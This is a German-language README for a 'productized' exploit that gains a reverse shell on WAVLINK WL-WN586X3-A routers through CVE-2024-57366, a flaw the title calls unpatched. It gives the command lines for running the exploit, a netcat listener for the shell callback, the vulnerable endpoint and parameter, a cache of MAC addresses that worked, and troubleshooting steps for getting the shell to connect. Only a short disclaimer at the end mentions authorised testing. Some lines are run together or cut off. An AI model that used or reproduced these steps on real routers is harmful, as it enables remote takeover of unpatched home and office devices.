
Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!)
Ein robuster Exploit für CVE-2024-57366, der Remote-Codeausführung auf verwundbaren Routern durch Umgehung der MAC-Adressvalidierung und Befehlseinschleusung ermöglicht.
Dies ist ein Post-Autorisierungs-Exploit, der erfordert, dass die „Fernsteuerung“-Funktion des Routers aktiviert ist und das Administratorkennwort vorhanden ist. Der Administrator-Benutzername ist als „admin“ fest codiert.
sudo-Zugriff (erforderlich für die Verwaltung von Netzwerkschnittstellen)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Das Skript fragt: „Use cached MAC for quick exploit? (y/n):“ – antworten Sie mit „y“
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target – IP-Adresse des Zielrouters (Standard: 127.0.0.1)--port – Port des Zielrouters (Standard: 80)--local-ip – Ihre lokale IP-Adresse für den Reverse-Shell-Rückruf--local-port – Lokaler Port für den Reverse-Shell-Rückruf (Standard: 4444)--password – Router-Administratorkennwort--ssid – WLAN-Netzwerkname (Standard: WAVLINK-Mesh_DC4B)--force-full – Vollständigen Exploit erzwingen, Cache-Prüfung überspringen--list-cached – Zwischengespeicherte MAC-Adressen auflisten und beendenCVE-2024-57366 nutzt eine Umgehung der MAC-Adressvalidierung in der Router-Firmware aus. Die Schwachstelle ermöglicht eine Befehlseinschleusung über den Parameter mac im Endpunkt /protocol.csp.
eth0, um den ursprünglichen Netzwerkkontext zu erhaltenindex=1, Token im URL-Pfad)Der Exploit speichert erfolgreiche MAC-Adressen automatisch in successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Manuelles Hinzufügen einer MAC: Bearbeiten Sie successful_macs.txt und fügen Sie Zeilen wie diese hinzu:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Netcat-Listener starten
nc -lvp 4444
# Exploit ausführen
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Wenn gefragt wird, ob die MAC-Adresse gespeichert werden soll, antworten Sie mit „y“
# Netcat-Listener starten
nc -lvp 4444
# Exploit ausführen (verwendet zwischengespeicherte MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Antworten Sie mit „y“, wenn gefragt wird, ob die zwischengespeicherte MAC verwendet werden soll
„No wireless adapters found“
sudo auszuführen„MAC address validation failed“
„Request timed out“ – Das könnte tatsächlich bedeuten, dass der Exploit funktioniert hat! – Überprüfen Sie Ihren Netcat-Listener auf eine Reverse-Shell-Verbindung – Der Router führt möglicherweise den Befehl aus, antwortet aber nicht auf HTTP
„Reverse shell not connecting“
– Überprüfen Sie, ob Ihre --local-ip korrekt ist (verwenden Sie ip addr show eth0)
– Stellen Sie sicher, dass keine Firewall die Verbindung blockiert
– Überprüfen Sie, ob der Netcat-Listener auf dem richtigen Port läuft
eth0 erreichbar seinCVE-2024-57366/
├── exploit.py # Haupt-Exploit-Skript
├── successful_macs.txt # MAC-Adress-Cache (automatisch erstellt)
└── README.md # Diese Datei
Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Tests. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Die Autoren sind nicht verantwortlich für die missbräuchliche Verwendung dieses Tools.
/protocol.cspDieses Projekt wird wie besehen zu Bildungszwecken bereitgestellt. Verwenden Sie es verantwortungsvoll und in Übereinstimmung mit den geltenden Gesetzen und Vorschriften.